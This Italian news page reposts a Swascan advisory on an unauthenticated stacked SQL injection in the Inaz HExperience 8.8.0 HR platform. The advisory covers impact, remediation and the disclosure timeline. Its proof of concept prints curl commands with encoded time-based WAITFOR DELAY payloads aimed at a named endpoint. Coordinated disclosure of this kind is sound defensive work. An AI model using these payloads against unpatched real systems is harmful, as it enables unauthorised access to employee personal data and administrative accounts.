Red Hot Cyber
La cybersecurity è condivisione. Riconosci il rischio, combattilo, condividi le tue esperienze ed incentiva gli altri a fare meglio di te.
Cerca

Swascan rileva un bug sull’applicazione web Inaz HExperience v.8.8.0

Redazione RHC : 8 Settembre 2022 09:49

L’ Offensive Security Team di Swascan ha identificato 1 vulnerabilità sull’applicazione web Inaz HExperience v.8.8.0La vulnerabilità è stata risolta nella versione 8.9.0.

INAZ

INAZ è l’azienda italiana specializzata in software e soluzioni per amministrare, gestire e organizzare il lavoro.

Progetta, produce e commercializza prodotti, strumenti e servizi che danno valore alle persone e mettono in moto le organizzazioni. INAZ continua a fare ricerca ed innovazione, collabora con università, promuove partnerships con aziende che sviluppano prodotti nuovi ed originali.

Descrizione del Prodotto

Iscriviti GRATIS ai WorkShop Hands-On della RHC Conference 2025 (Giovedì 8 maggio 2025)

Il giorno giovedì 8 maggio 2025 presso il teatro Italia di Roma (a due passi dalla stazione termini e dalla metro B di Piazza Bologna), si terranno i workshop "hands-on", creati per far avvicinare i ragazzi alla sicurezza informatica e alla tecnologia. Questo anno i workshop saranno:

  • Creare Un Sistema Ai Di Visual Object Tracking (Hands on)
  • Social Engineering 2.0: Alla Scoperta Delle Minacce DeepFake
  • Doxing Con Langflow: Stiamo Costruendo La Fine Della Privacy?
  • Come Hackerare Un Sito WordPress (Hands on)
  • Il Cyberbullismo Tra Virtuale E Reale
  • Come Entrare Nel Dark Web In Sicurezza (Hands on)

  • Potete iscrivervi gratuitamente all'evento, che è stato creato per poter ispirare i ragazzi verso la sicurezza informatica e la tecnologia.
    Per ulteriori informazioni, scrivi a [email protected] oppure su Whatsapp al 379 163 8765


    Supporta RHC attraverso:


    Ti piacciono gli articoli di Red Hot Cyber? Non aspettare oltre, iscriviti alla newsletter settimanale per non perdere nessun articolo.

    Inaz HExperience piattaforma HR web-based, integra e armonizza soluzioni, strumenti e informazioni che aiutano tutti a lavorare meglio.

    HExperience facilita la gestione dei talenti, la collaborazione e le forme innovative di organizzazione. La piattaforma HExperience è costituita da un database potente su cui s’innestano i moduli operativi necessari a ogni azienda.

    Technical summary

    L’Offensive Security Team di Swascan ha riscontrato una importante vulnerabilità sul prodotto Inaz HExperience v8.8.0:

    VulnerabilityCVSSv3.1CVSSv3.1 Base Vector
    Stacked SQL injection (non autenticata)9.8 – CriticalAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

    Nella sezione seguente vengono forniti dettagli tecnici sulla vulnerabilità ed una POSC (proof-of-concept). Questa vulnerabilità può interessare centinaia di dispositivi connessi a Internet.

    Descrizione

    In Inaz HExperience versione 8.8.0, un potenziale attaccante sarà in grado di accedere da remoto, senza alcuna autenticazione necessaria, alle informazioni contenute nel database ed eseguire operazioni come l’esfiltrazione e la modifica di account utente e amministrativi, di ottenere informazioni personali degli utenti (PII) e altro ancora.

    Proof of Concept

    Nella PoC seguente, a dimostrazione della presenza della vulnerabilità, viene illustrata l’esecuzione della SQL Injection in Microsoft SQL Server, tramite tecnica time-based:

    $ time curl -kis -X POST -d
    "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc=
    31273b57414954464f522044454c41592027303a303a35272d2d"
    https://URL/Portale/FunMobile/VerificaCand.aspx
    Il nome di oggetto 'UserHR.cand_est' non è
    valido.

    SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = '1';WAITFOR DELAY '0:0:5'--' real 0m5,649s user 0m0,026s sys 0m0,000s $ time curl -kis -X POST -d "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc= 31273b57414954464f522044454c41592027303a303a3130272d2d" https://URL/Portale/FunMobile/VerificaCand.aspx Il nome di oggetto 'UserHR.cand_est' non è valido.

    SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = '1';WAITFOR DELAY '0:0:10'--' real 0m10,655s user 0m0,019s sys 0m0,005s $ time curl -kis -X POST -d "ValMail=273120756E696F6E2073656C65637420313233&ValCodFisc= 31273b57414954464f522044454c41592027303a303a3135272d2d" https://URL/Portale/FunMobile/VerificaCand.aspx Il nome di oggetto 'UserHR.cand_est' non è valido.

    SELECT kint, cod_fisc_caes FROM UserHR.cand_est WHERE cod_fisc_caes = '1';WAITFOR DELAY '0:0:15'--' real 0m15,819s user 0m0,021s sys 0m0,009s

    Impatto

    Se sfruttata correttamente, questa vulnerabilità potrebbe comportare l’acquisizione dei diritti di amministratore locale, con conseguente accesso a tutte le funzionalità del portale. In alcuni casi potrebbe essere possibile eseguire comandi sul sistema operativo remoto.

    Remediation

    Aggiornare l’applicativo INAZ HEXPERIENCE alla versione 8.10.2.

    Timeline della Disclosure

    07-04-2022: Vulnerabilità scoperta
    07-04-2022: INAZ contattato via e-mail (1a volta, nessuna risposta)
    15-04-2022: INAZ contattato via e-mail (2a volta, il vendor risponde)
    20-04-2022: INAZ chiede un approfondimento tecnico via call

    27-04-2022: Call per approfondimento tecnico
    23-05-2022: INAZ rilascia una patch (nuova versione HEXPERIENCE v8.9.0)
    30-06-2022: Swascan invia una bozza del Security Advisory a INAZ
    19-07-2022: INAZ approva il documento di disclosure
    08-09-2022: Swascan pubblica la vulnerabilità

    Fonti e Riferimenti

    https://cwe.mitre.org/data/definitions/89.html

    https://www.owasp.org/index.php/SQL_Injection

    https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.md

    https://owasp.org/Top10/A03_2021-Injection/

    Redazione
    La redazione di Red Hot Cyber è composta da un insieme di persone fisiche e fonti anonime che collaborano attivamente fornendo informazioni in anteprima e news sulla sicurezza informatica e sull'informatica in generale.

    Articoli in evidenza

    Una PE in Microsoft Windows sfruttata da 2 anni Nel Patch Tuesday. Aggiornare avverte CISA e ACN

    All’interno del Patch Tuesday di marzo è stata inclusa la CVE-2025-24983, una Vulnerabilità di elevazione dei privilegi del sottosistema kernel Win32 di Microsoft Windows. La Cybersec...

    Ragazzi, Pronti per i Workshop della RHC Conference? Scopriamo assieme Deepfake, AI, Darkweb, Ethical Hacking, Doxing e Cyberbullismo

    Giovedì 8 maggio, la Red Hot Cyber Conference 2025 ospiterà un’intera giornata dedicata ai ragazzi con i Workshop Hands-on (organizzati in collaborazione con Accenture Italia). Si tra...

    Arriva NightSpire! Un Nuovo Attore nel Panorama del Ransomware

    Nelle ricognizioni nel mondo dell’underground e dei gruppi criminali svolte dal laboratorio di intelligence delle minacce DarkLab di Red Hot Cyber, ci siamo imbattuti all’interno di un D...

    FUNKSEC rivendica un attacco Informatico All’Università di Modena e Reggio Emilia. Scopri i dettagli

    Nella giornata di oggi, la banda di criminali informatici di FUNKSEC rivendica all’interno del proprio Data Leak Site (DLS) un attacco informatico all’università italiana di Modena ...

    Attacco a X: Scovato il Responsabile? Le Indagini Puntano in una Direzione Inattesa!

    L’attacco informatico a X, il social network di Elon Musk, ha scatenato una vera e propria caccia ai responsabili. Dopo le dichiarazioni dello stesso Musk, che ha attribuito l’attacco a ...